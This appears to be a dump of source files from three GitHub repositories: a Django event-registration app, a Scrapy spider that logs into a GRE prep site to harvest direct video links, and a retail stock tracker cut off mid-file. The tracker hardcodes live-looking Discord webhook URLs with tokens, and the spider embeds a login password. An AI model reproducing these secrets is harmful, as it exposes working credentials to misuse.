test_create(self):\n self.assertEqual(self.ev.seats_taken, 0)\n self.create_subject()\n self.assertEqual(self.ev.seats_taken, 1)\n\n def test_confirm(self):\n subj = self.create_subject()\n self.assertFalse(subj.status_confirmed)\n response = self.client.get(reverse('subject-confirm', kwargs={'token': subj.token}))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name='registration/confirm.html')\n self.assertTrue(Subject.objects.filter(pk=subj.pk).first().status_confirmed)\n\n def test_modify(self):\n subj = self.create_subject()\n response = self.client.get(reverse('subject-modify', kwargs={'slug': subj.token}))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name='registration/subject_form.html')\n data = response.context['form'].fields\n data['num_seats'] = 2\n response = self.client.post(\n reverse('subject-modify', kwargs={'slug': subj.token}), data=data)\n self.assertEqual(response.status_code, 302)\n self.assertTrue(response.url.startswith(os.path.join('/', subj.token, 'modify')))\n self.assertEqual(self.ev.seats_taken, 2)\n\n def test_delete(self):\n subj = self.create_subject()\n response = self.client.get(reverse('subject-delete', kwargs={'slug': subj.token}))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name='registration/subject_confirm_delete.html')\n response = self.client.post(reverse('subject-delete', kwargs={'slug': subj.token}))\n self.assertEqual(response.status_code, 302)\n self.assertTrue(response.url.startswith('/'))\n self.assertEqual(Subject.objects.filter(pk=subj.pk).count(), 0)\n self.assertEqual(self.ev.seats_taken, 0)\n" }, { "alpha_fraction": 0.6215009689331055, "alphanum_fraction": 0.6228747963905334, "avg_line_length": 32.86046600341797, "blob_id": "470293812540d426b7f24b53c37f082c30e027f9", "content_id": "bddaaf86873c5385d916cf84955faf2252a62085", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5823, "license_type": "permissive", "max_line_length": 106, "num_lines": 172, "path": "/mailing.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "import os\nimport time\nimport django\n\nfrom datetime import timedelta\n\nfrom django.utils import timezone\nfrom django.core.mail import send_mail\nfrom django.utils.translation import gettext_lazy as _, ngettext, ngettext_lazy\nfrom django.db.models import Q\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings'\ndjango.setup()\n\n# needs to be after django.setup()\nfrom registration.models import Subject\nfrom mysite.settings import DEFAULT_FROM_EMAIL, BASE_URL\n\n# intervall for checking for new mails to be send\nINTERVAL = 30\n# deadtime after a mail has been sent (mail server has 10 Mails/minute restriction)\nDEADTIME = 10\nconfirm_url = lambda base, token: os.path.join(base, token, 'confirm')\nmodify_url = lambda base, token: os.path.join(base, token, 'modify')\n\ndef do_send_mail(subject, message, to):\n try:\n send_mail(subject, message, DEFAULT_FROM_EMAIL, [to])\n time.sleep(DEADTIME)\n return True \n except Exception as e:\n print(e)\n return False \n\n## send when the subject registers for the event,\n## contains the link for the registration confirmation\ndef confirmation_request_mail(sub):\n subject = _('Registration for %s')\n message = _('mail_body_%(name)s_%(event)s_%(hold_back_hours)i_%(confirm_url)s')\n\n subject = subject%sub.event.title\n message = message%dict(\n 
name=sub.given_name,\n event=sub.event,\n hold_back_hours=sub.event.hold_back_hours,\n confirm_url=confirm_url(BASE_URL, sub.token),\n modify_url=modify_url(BASE_URL, sub.token)\n )\n return do_send_mail(subject, message, sub.email)\n\n## send after some timeout to warn about registration deletion\ndef remainder_mail(sub):\n subject = _('Reminder of registration for %s')\n message = _('reminder_body_%(name)s_%(event)s_%(cancel_hours)i_%(confirm_url)s_%(modify_url)s')\n\n subject = subject%sub.event.title\n message = message%dict(\n name=sub.given_name,\n event=sub.event,\n cancel_hours=sub.event.hold_back_hours - sub.event.reminder_hours,\n confirm_url=confirm_url(BASE_URL, sub.token),\n modify_url=modify_url(BASE_URL, sub.token)\n )\n return do_send_mail(subject, message, sub.email)\n\n## send when the subject clicked on the registration confirmation link\ndef confirmation_mail(sub):\n subject = _('Confirmed registration for %s')\n message = _('confirmation_body_%(name)s_%(event)s_%(modify_url)s_%(seats)s')\n\n seats = ''\n if sub.event.assigned_seats:\n seats = _(ngettext_lazy(\n 'subject_seats_%(seat_nums)s',\n 'subject_seats_pl_%(seat_nums)s',\n sub.num_seats))%dict(seat_nums=sub.seats)\n seats += '\\n(Plan: %s/static/registration/GHS_physik.pdf)\\n'%BASE_URL\n\n subject = subject%sub.event.title\n message = message%dict(\n name=sub.given_name,\n event=sub.event,\n seats=seats,\n modify_url=modify_url(BASE_URL, sub.token),\n )\n return do_send_mail(subject, message, sub.email)\n\ndef cancellation_mail(sub):\n subject = _('Cancellation of registration for %s')\n message = _('cancellation_body_%(name)s_%(event)s')\n\n subject = subject%sub.event.title\n message = message%dict(\n name=sub.given_name,\n event=sub.event,\n ) \n return do_send_mail(subject, message, sub.email)\n\ndef next_subject(query):\n try:\n sub = Subject.objects \\\n .filter(query) \\\n .order_by('reg_date')[0]\n return sub\n except:\n return None\n\ndef handle_new_subjects():\n while True:\n sub = next_subject(Q(confirmation_request_sent=False))\n if sub is None: return True\n if not confirmation_request_mail(sub): break\n sub.confirmation_request_sent = True\n sub.save() \n return False\n\ndef handle_confirmed_subjects():\n while True:\n sub = next_subject(Q(status_confirmed=True) & Q(confirmation_sent=False))\n if sub is None: return True\n if not confirmation_mail(sub): break\n sub.confirmation_sent = True\n sub.save() \n return False\n\ndef handle_pending_subjects():\n while True:\n # fetch new list of pending subjects\n subs = Subject.objects \\\n .filter(confirmation_request_sent=True, status_confirmed=False) \\\n .order_by('reg_date')\n\n # nothing to do anymore, so return\n if len(subs) == 0: return True\n\n # iterate over possible subject until one is found where email has to be send. Then\n # start all over to minimize risk that s.t. has changed in the DB in the meantime\n mail_sent=False\n for sub in subs:\n if not sub.reminder_sent:\n # check, how long ago the request was send... 
send remainder (once) if certain timeout hit\n if timezone.now() > sub.reg_date + timedelta(hours=sub.event.reminder_hours):\n if not remainder_mail(sub): return False\n sub.reminder_sent = True\n sub.save() \n mail_sent=True\n break\n else:\n if timezone.now() > sub.reg_date + timedelta(hours=sub.event.hold_back_hours): \n if not cancellation_mail(sub): return False\n sub.delete()\n mail_sent=True\n break\n\n # nothing to do for matching subjects\n if not mail_sent:\n return True\n\ndef mailer():\n if not handle_new_subjects(): return\n if not handle_pending_subjects(): return\n if not handle_confirmed_subjects(): return\n\nif __name__ == \"__main__\":\n try:\n while True:\n mailer()\n time.sleep(INTERVAL)\n except (KeyboardInterrupt, SystemExit):\n print(\"Exiting\")\n except Exception as e:\n raise e" }, { "alpha_fraction": 0.69901442527771, "alphanum_fraction": 0.69901442527771, "avg_line_length": 59, "blob_id": "df600539c8f4dcd653b57961abf0f8ce4a26855d", "content_id": "ecf9559a760592105975c9eb46a9c94815c0c38a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1319, "license_type": "permissive", "max_line_length": 98, "num_lines": 22, "path": "/registration/urls.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.CreateSubjectView.as_view(), name='index'),\n path('privacy', lambda r: render(r, \"registration/privacy.html\"), name='privacy'),\n path('site_notice', lambda r: render(r, \"registration/site_notice.html\"), name='site_notice'),\n path('<token>/confirm', views.confirm, name='subject-confirm'),\n path('<slug:slug>/modify', views.SubjectView.as_view(), name='subject-modify'),\n path('<slug:slug>/delete', views.DeleteSubjectView.as_view(), name='subject-delete'),\n path('submitted', views.submitted, name='submitted'),\n path('subjects', views.ListSubjectView.as_view(), name='subjects'),\n path('subjects/create', views.CreateSubjectViewAdmin.as_view(), name='subjects-create'),\n path('subjects/<slug:pk>', views.SubjectViewAdmin.as_view(), name='subjects-detail'),\n path('events', views.ListEventView.as_view(), name='events'),\n path('events/create', views.CreateEventView.as_view(), name='events-create'),\n path('events/<slug:pk>/delete', views.DeleteEventView.as_view(), name='events-delete'),\n path('events/<slug:pk>/participants', views.subject_table, name='events-participants'),\n path('events/<slug:pk>', views.EventView.as_view(), name='events-detail'),\n]" }, { "alpha_fraction": 0.5043478012084961, "alphanum_fraction": 0.686956524848938, "avg_line_length": 18.16666603088379, "blob_id": "7ced292224c1ca65d22d206ec893f0b9a6eba96b", "content_id": "50284a4b7e0e7231eb94673b9c3617f3bcd19f67", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 115, "license_type": "permissive", "max_line_length": 25, "num_lines": 6, "path": "/requirements.txt", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "django==2.2.28\ndjango-material==1.5.8\ndjango-tables2==2.1.0\n# django-auth-ldap==2.2.0\npsycopg2==2.8.6\nnames==0.3.0\n" }, { "alpha_fraction": 0.5719298124313354, "alphanum_fraction": 0.5859649181365967, "avg_line_length": 32.52941131591797, "blob_id": "575ac603ab90b0d0437d821acb3b805541ca3559", "content_id": "43870033b65ed2dff87136244b79d4e2e7a487ee", "detected_licenses": [ 
"BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 570, "license_type": "permissive", "max_line_length": 121, "num_lines": 17, "path": "/registration/templates/registration/confirm.html", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "{% extends \"registration/base.html\" %}\n{% block content %}\n\n<div>\n {% load i18n %}\n <div style=\"margin: 30 0 30 0\">\n <div class=\"btn green\" style=\"height: auto\">\n {% blocktrans %}Your registration for event {{event}} is confirmed!{% endblocktrans %}\n </div>\n {% if event.assigned_seats %}\n {% blocktrans %}A confirmation email will be sent to you which also includes your seat number.{% endblocktrans %}\n {% endif %}\n </div>\n <a href=\"JavaScript:window.close()\">{% trans \"Close page.\" %} </a>\n</div>\n\n{% endblock %}\n" }, { "alpha_fraction": 0.7048878073692322, "alphanum_fraction": 0.7156471014022827, "avg_line_length": 43.5616455078125, "blob_id": "51bb64927b4d711e02ff40c08f41d26947fa8842", "content_id": "6d421c7a9322bcedb90d231ee00f48501134f465", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3253, "license_type": "permissive", "max_line_length": 160, "num_lines": 73, "path": "/registration/models.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "import secrets\n\nfrom django.core.validators import MinValueValidator\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.urls import reverse\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.validators import int_list_validator\n\nfrom mysite import settings\n\n\nclass Event(models.Model):\n title = models.CharField(max_length=1024, help_text='name of the event')\n date = models.DateTimeField(default=timezone.now, help_text='date and time of the event')\n is_active = models.BooleanField(default=True)\n num_total_seats = models.IntegerField(help_text=\"total number of seats available\")\n num_max_per_subject = models.IntegerField(default=5, help_text=\"maximum number of seats that can be booked by one person\")\n enable_on = models.DateTimeField(_('enable_on'), default=timezone.now)\n disable_on = models.DateTimeField(_('disable_on'), default=timezone.now)\n assigned_seats = models.BooleanField(default=False, help_text=\"each entry has an assigned seat number\")\n reminder_hours = models.IntegerField(default=12, help_text=\"hours to wait after registration before sending the reminder for the registration confirmation\")\n hold_back_hours = models.IntegerField(default=24, help_text=\"hours to wait after registration before cancelling a registration that was not confirmed\")\n\n @property\n def seats_taken(self):\n return sum(map(lambda x: x.num_seats, Subject.objects.filter(event=self)))\n\n def get_absolute_url(self):\n return reverse('event-detail', args=[self.id])\n\n def __str__(self):\n return _(\"'%(title)s' on %(date)s\")%dict(title=self.title, date=timezone.localtime(self.date).strftime('%d.%m.%y %H:%M'))\n\n\ndef token():\n return secrets.token_urlsafe(32)\n\n\nclass SubjectBase(models.Model):\n name = models.CharField(_('name'), max_length=200)\n given_name = models.CharField(_('given_name'), max_length=200)\n email = models.EmailField(_('email'), max_length=200)\n\n event = models.ForeignKey(Event, verbose_name=_('event'), on_delete=models.CASCADE)\n reg_date = models.DateTimeField(_('reg_date'), default=timezone.now)\n num_seats = 
models.IntegerField(_('num_seats'), default=1, validators=[MinValueValidator(1)])\n seats = models.CharField(_('seats'), max_length=1024, default='', validators=[int_list_validator])\n\n status_confirmed = models.BooleanField(_('status_confirmed'), default=False)\n confirmation_request_sent = models.BooleanField(_('confirmation_request_sent'), default=False)\n confirmation_sent = models.BooleanField(_('confirmation_sent'), default=False)\n reminder_sent = models.BooleanField(_('reminder_sent'), default=False)\n token = models.CharField(max_length=255, default=token)\n\n class Meta:\n unique_together = ('event', 'email')\n\n def get_absolute_url(self):\n return reverse('subject-modify', args=[self.token])\n\n def __str__(self):\n return \"%s\"%(self.event)\n\n\nclass SubjectExtended(SubjectBase):\n address = models.CharField(_('address'), max_length=50)\n city = models.CharField(_('city'), max_length=60)\n post_code = models.IntegerField(_('post_code'))\n phone = models.CharField(_('phone'), max_length=50)\n\n\nSubject = eval(settings.SUBJECT_CLASS)\n" }, { "alpha_fraction": 0.5638531446456909, "alphanum_fraction": 0.5776592493057251, "avg_line_length": 25.781513214111328, "blob_id": "53c3440b5327d2ee3eca1fee68707be38f23cf69", "content_id": "f5d8a051214cce3a80094cec50ac89e99833b237", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3187, "license_type": "permissive", "max_line_length": 116, "num_lines": 119, "path": "/registration/sub_table_tex.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport shutil, re\nfrom io import StringIO\nimport os\nimport string\nimport subprocess\nfrom django.utils.translation import gettext_lazy as _, ngettext_lazy\n\n\nLATEX_TEMPLATE = string.Template(\n r'''\\documentclass[a4paper]{article}\n\\usepackage[ngerman]{babel}\n\\usepackage[utf8]{inputenc}\n\\usepackage[T1]{fontenc}\n\n$options\n\\usepackage{booktabs}\n\\usepackage{longtable}\n\\usepackage{pifont}\n\\usepackage[%\n left=0.50in,%\n right=0.50in,%\n top=1.0in,%\n bottom=1.0in,%\n paperheight=11in,%\n paperwidth=8.5in%\n]{geometry}%\n\n\\title{$title}\n\t \n\\begin{document}\n\\maketitle\n\n\\begin{center}\n\\begin{longtable}{ r p{0.15\\textwidth} p{0.15\\textwidth} p{0.35\\textwidth} | r | c | c}\n$header\n\\toprule\n$rows\n\\end{longtable}\n\\end{center}\n\\end{document} \n '''\n)\n\n\n# https://stackoverflow.com/questions/16259923/how-can-i-escape-latex-special-characters-inside-django-templates\ndef tex_escape(text):\n \"\"\"\n :param text: a plain text message\n :return: the message escaped to appear correctly in LaTeX\n \"\"\"\n conv = {\n '&': r'\\&',\n '%': r'\\%',\n '$': r'\\$',\n '#': r'\\#',\n '_': r'\\_',\n '{': r'\\{',\n '}': r'\\}',\n '~': r'\\textasciitilde{}',\n '^': r'\\^{}',\n '\\\\': r'\\textbackslash{}',\n '<': r'\\textless{}',\n '>': r'\\textgreater{}',\n }\n regex = re.compile('|'.join(re.escape(str(key)) for key in sorted(conv.keys(), key = lambda item: - len(item))))\n return regex.sub(lambda match: conv[match.group()], text)\n\n\ndef create_table(ev, subjects):\n project_path = os.path.curdir\n build_path = os.path.join(project_path, '.build')\n out_filename = os.path.join(build_path, 'template')\n documentclass_name = 'article'\n\n options = []\n options_latex = '\\n'.join(\n r'\\newcommand{\\%s}{%s}' % pair for pair in options\n )\n options_latex = ''\n title = ''\n\n if len(subjects)>0:\n title = str(subjects[0].event)\n seats = 
subjects[0].event.num_max_per_subject\n\n rows = StringIO()\n for i, sub in enumerate(subjects):\n row = list(map(tex_escape, [\n str(i+1),\n sub.name,\n sub.given_name,\n sub.email]))\n row.extend([\n sub.seats if ev.assigned_seats else str(sub.num_seats),\n '\\\\ding{51}' if sub.status_confirmed else '\\\\ding{55}',\n ''\n ])\n rows.write('%s\\\\\\\\ \\\\hline \\n' % ' & '.join(row))\n\n header = '%s\\\\\\\\ \\n' % ' & '.join(\n map(str, ['', _('name'), _('given_name'), _('email'), \n ngettext_lazy('seat', 'seats', seats), _('confirmed'), _('present')]))\n\n latex = LATEX_TEMPLATE.safe_substitute(\n options=options_latex, documentclass=documentclass_name,\n title=title,\n header=header, rows=rows.getvalue(),\n )\n\n shutil.rmtree(build_path, ignore_errors=True)\n\n os.makedirs(build_path, exist_ok=True)\n with open(out_filename + '.tex', 'w') as out_file:\n out_file.write(latex)\n\n subprocess.run(['pdflatex', '-output-directory', build_path, out_filename])\n # shutil.copy2(out_filename + '.pdf', os.path.dirname(in_filename))\n return out_filename+'.pdf'\n" }, { "alpha_fraction": 0.6746602654457092, "alphanum_fraction": 0.6866506934165955, "avg_line_length": 31.102563858032227, "blob_id": "314ea13d2f59f0ff90496a82d6c4372b413ef5a8", "content_id": "d505ad14876534f875cc5985802fb171da02f520", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1251, "license_type": "permissive", "max_line_length": 99, "num_lines": 39, "path": "/mysite/local_settings.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "import os\n\n# LDAP authentication example configuration, requires django-auth-ldap package\n# try:\n# import ldap\n# from django_auth_ldap.config import LDAPSearch\n# AUTHENTICATION_BACKENDS = [\"django_auth_ldap.backend.LDAPBackend\"]\n# AUTH_LDAP_SERVER_URI = \"ldap://__ldap_server__/\"\n\n# AUTH_LDAP_BIND_DN = \"\"\n# AUTH_LDAP_BIND_PASSWORD = \"\"\n# AUTH_LDAP_USER_SEARCH = LDAPSearch(\n# \" cn=__some__,dc=__ldap__,dc=__de__\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n# )\n# except:\n# pass\n\n\n# Mailing\n### backend for testing, comment for production\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n# Python has a little SMTP server built-in. You can start it in a second console with this command:\n# python -m smtpd -n -c DebuggingServer localhost:1025\n# This will simply print all the mails sent to localhost:1025 in the console.\n# You have to configure Django to use this server in your settings.py:\n# EMAIL_HOST = 'localhost'\n# EMAIL_PORT = 1025\n\n### production email configuration\n# EMAIL_HOST = '__mailserver__'\n# EMAIL_PORT = 587\n# EMAIL_HOST_USER = '__mailuser__'\n# EMAIL_HOST_PASSWORD = '__mailuserpw__'\n# EMAIL_USE_TLS = True\nDEFAULT_FROM_EMAIL = '__from-email__'\n\nDEBUG = True\nPRIVACY_NOTICE = True" } ]
num_files: 13
repo_name: whalehulk/vidpy
repo_url: https://github.com/whalehulk/vidpy
snapshot_id: 29c04eb6df8469c3758f4419b7bdd3ca11651f4f
revision_id: 6bf7770e3ef4d58da6ce716be404b5e63e21c18d
directory_id: 9b48efe91a754d493d6aafccc9a83e75d4a88083
branch_name: refs/heads/master
visit_date: 2021-09-07T15:51:58.641513
revision_date: 2018-02-25T14:12:12
committer_date: 2018-02-25T14:12:12
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6677461266517639, "alphanum_fraction": 0.6690414547920227, "avg_line_length": 29.27450942993164, "blob_id": "182ed370ad836ccc967b8966341864cdb76dc642", "content_id": "0db722359fff9e78bdf981620df88d363276371c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1544, "license_type": "permissive", "max_line_length": 77, "num_lines": 51, "path": "/magooshScraper.py", "repo_name": "whalehulk/vidpy", "src_encoding": "UTF-8", "text": "import scrapy\nfrom bs4 import BeautifulSoup\n\nclass scraper(scrapy.Spider):\n\tname = 'mangoosh'\n\tstart_urls = ['http://gre.magoosh.com/login']\n\n\tdef parse(self, response):\n\t\treturn scrapy.FormRequest.from_response(\n\t\t\tresponse,\n\t\t\t'''\n\t\t\tReplace the fake text below with your own registered\n\t\t\temail and password on http://gre.magoosh.com:\n\t\t\t'''\n\t\t\tformdata={'session[login]': '[email protected]', 'session[password]': 'root@09'},\n\t\t\tcallback=self.after_login\n\t\t)\n\n\tdef after_login(self, response):\n\t\tif 'Dashboard' in response.body:\n\t\t\tself.logger.info('Logged in successfully!')\n\n\t\treturn scrapy.Request('http://gre.magoosh.com/lessons',\n\t\t\tcallback=self.lessonsPage_loaded)\n\n\tdef lessonsPage_loaded(self, response):\n\t\tself.logger.info('Lessons page opened.')\n\t\tsoup = BeautifulSoup(response.body)\n\t\tfor categ in soup.find_all('h2'):\n\t\t\t# Set the Subject name to crawl\n\t\t\t# In this example, Maths section is scraped.\n\t\t\tif 'Math' in categ:\n\t\t\t\tself.logger.info('Math section found.')\n\t\t\t\tcgparent = categ.parent.parent\n\t\t\t\tfor vu in cgparent.find_all('a'):\n\t\t\t\t\tlink = str(vu.get('href'))\n\t\t\t\t\tif '/lessons/' in link:\n\t\t\t\t\t\ts = 'http://gre.magoosh.com' + link + \"\\n\"\n\t\t\t\t\t\treq = scrapy.Request(s, callback=self.videoPage_loaded)\n\t\t\t\t\t\tyield req\n\t\treturn\n\n\tdef videoPage_loaded(self, response):\n\t\tself.logger.info('Fetching video...')\n\t\tsoup = BeautifulSoup(response.body)\n\t\tfor div in soup.find_all('div'):\n\t\t\tif div.get('data-file'):\n\t\t\t\tvl = div.get('data-file')\n\t\t\t\tf = open('scrapedVideoLinks.txt', 'a')\n\t\t\t\tf.write(str(vl) + '\\n')\n\t\t\t\tf.close()\n" }, { "alpha_fraction": 0.7677275538444519, "alphanum_fraction": 0.7716359496116638, "avg_line_length": 73.625, "blob_id": "89e9e0963b4a1187bf87a4c28b3096fd395231bc", "content_id": "87aad3ef3f88a5fa8789c04cca6e48e2d4c6ed83", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1791, "license_type": "permissive", "max_line_length": 455, "num_lines": 24, "path": "/README.md", "repo_name": "whalehulk/vidpy", "src_encoding": "UTF-8", "text": "# vidpy\nA Python based customizable script for getting/scraping links to videos hosted on any website. Implemented using Scrapy and BeautifulSoup.\n\n#### Why?\nI created this script for my friend who didn't watch all the videos in the Maths section from [gre.magoosh.com](http://gre.magoosh.com) and was worried about his ending subscription. There were way too many steps to go through and download all the videos. 
So I built this script with just 2 hours of effort to scrape all the links to the videos (where they were directly hosted, in this case, Cloudfront), so that he can download all the videos in one go.\n\n### Demo:\n[![Vidpy Demo Video](http://img.youtube.com/vi/yr1EYLmSIdo/0.jpg)](http://youtu.be/yr1EYLmSIdo)\n\n#### Requirements:\n- A valid subscription is neccessary for downloading videos off the site.\n- Scrapy and BeautifulSoup should be installed for the script to work. Links:\n - [Install Scrapy](http://doc.scrapy.org/en/1.0/intro/install.html)\n - [Install BeautifulSoup](http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-beautiful-soup)\n\n#### Executing the script:\nSee [Scrapy's documentation](http://doc.scrapy.org/en/latest/intro/tutorial.html) to learn how to execute spiders and crawlers.\n\n#### Features:\n- You can customize this Python code to different categories in the site. In the current code, only the videos in Mathematics section will be scraped from [gre.magoosh.com](http://gre.magoosh.com).\n- The algorithm and logic behind this script can be applied to any site to extract any form of data with precision.\n- Only the stuff you need will be extracted and rest all will be ignored. This saves time and overall bandwidth used to successfully run the script.\n\n**Note to contributors:** Please update the documentation whenever neccessary.\n" } ]
num_files: 2
repo_name: tmacli/product-tracker-mine
repo_url: https://github.com/tmacli/product-tracker-mine
snapshot_id: 3cbf26fb092a9523b9a8afe4058d7215c82c97b1
revision_id: f1728f3b2fa34f8a4c00eca860ffa0f71d59f4e7
directory_id: 0d47cdd00e4460e5e9cc36f0de7ad5b0ff1a46d7
branch_name: refs/heads/master
visit_date: 2022-04-25T18:08:57.694193
revision_date: 2020-04-29T03:17:27
committer_date: 2020-04-29T03:17:27
github_id: 259,700,598
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.5589970350265503, "alphanum_fraction": 0.6120021939277649, "avg_line_length": 45.55263137817383, "blob_id": "338cba0fcbd35fb7b4c7930ee26227a818632dab", "content_id": "8892e06ec2c28c27bf87ac149c79aaf96f9b3616", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10848, "license_type": "no_license", "max_line_length": 477, "num_lines": 228, "path": "/app.py", "repo_name": "tmacli/product-tracker-mine", "src_encoding": "UTF-8", "text": "# https://github.com/tnware/product-checker\r\n# by Tyler Woods\r\n# coded for Bird Bot and friends\r\n# https://tylermade.net\r\nimport requests\r\nimport time\r\nimport json\r\nfrom datetime import datetime\r\nimport urllib.parse as urlparse\r\nfrom urllib.parse import parse_qs\r\nimport csv\r\nstockdict = {}\r\nsku_dict = {}\r\nbestbuylist = []\r\ntargetlist = []\r\nwalmartlist = []\r\nbbdict = {}\r\n\r\n\r\nwebhook_dict = {\r\n#\"name_your_webhook\": \"http://your.webhook.url/123\"\r\n\r\n# Best Buy - Nintendo\r\n\r\n\"bb_neon_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"bb_gray_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"bb_animalcrossing_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"bb_ringfit\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\r\n# Best Buy - Webcams\r\n\r\n\"bb_logitech_c920s\": \"https://discordapp.com/api/webhooks/704744387615260784/HxNrljwTKMTBnRg5A7NuepkXZOLC-nZVq28xJPe6algexvunX0trPKgugEZbQ7SJB8sc\",\r\n\"bb_logitech_c920\": \"https://discordapp.com/api/webhooks/704744387615260784/HxNrljwTKMTBnRg5A7NuepkXZOLC-nZVq28xJPe6algexvunX0trPKgugEZbQ7SJB8sc\",\r\n\"bb_logitech_c922\": \"https://discordapp.com/api/webhooks/704744387615260784/HxNrljwTKMTBnRg5A7NuepkXZOLC-nZVq28xJPe6algexvunX0trPKgugEZbQ7SJB8sc\",\r\n\r\n# Target Nintendo\r\n\r\n\"target_neon_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"target_gray_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"target_ringfit\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\r\n# Walmart Nintendo\r\n\r\n\"walmart_neon_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"walmart_gray_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"walmart_animalcrossing_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"walmart_ringfit\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\"\r\n}\r\n\r\n\r\nurldict = {\r\n#\"http://product.url/123\": \"name_your_webhook\",\r\n# Best Buy - Nintendo\r\n\"https://www.bestbuy.com/site/nintendo-switch-32gb-console-neon-red-neon-blue-joy-con/6364255.p?skuId=6364255\": 
\"bb_neon_switch\",\r\n\"https://www.bestbuy.com/site/nintendo-switch-32gb-console-gray-joy-con/6364253.p?skuId=6364253\": \"bb_gray_switch\",\r\n\"https://www.bestbuy.com/site/nintendo-switch-animal-crossing-new-horizons-edition-32gb-console-multi/6401728.p?skuId=6401728\": \"bb_animalcrossing_switch\",\r\n\"https://www.bestbuy.com/site/ring-fit-adventure-nintendo-switch/6352149.p?skuId=6352149\": \"bb_ringfit\",\r\n\r\n# Best Buy - Webcams\r\n\"https://www.bestbuy.com/site/logitech-c920s-hd-webcam/6321794.p?skuId=6321794\": \"bb_logitech_c920s\",\r\n\"https://www.bestbuy.com/site/logitech-c920-pro-webcam-black/4612476.p?skuId=4612476\": \"bb_logitech_c920\",\r\n\"https://www.bestbuy.com/site/logitech-c922-pro-stream-webcam/5579380.p?skuId=5579380\": \"bb_logitech_c922\",\r\n\r\n# Target Nintendo\r\n\r\n\"https://www.target.com/p/nintendo-switch-with-neon-blue-and-neon-red-joy-con/-/A-77464001\": \"target_neon_switch\",\r\n\"https://www.target.com/p/nintendo-switch-with-gray-joy-con/-/A-77464002\": \"target_gray_switch\",\r\n\"https://www.target.com/p/ring-fit-adventure---nintendo-switch/-/A-76593324\": \"target_ringfit\",\r\n\r\n# Walmart 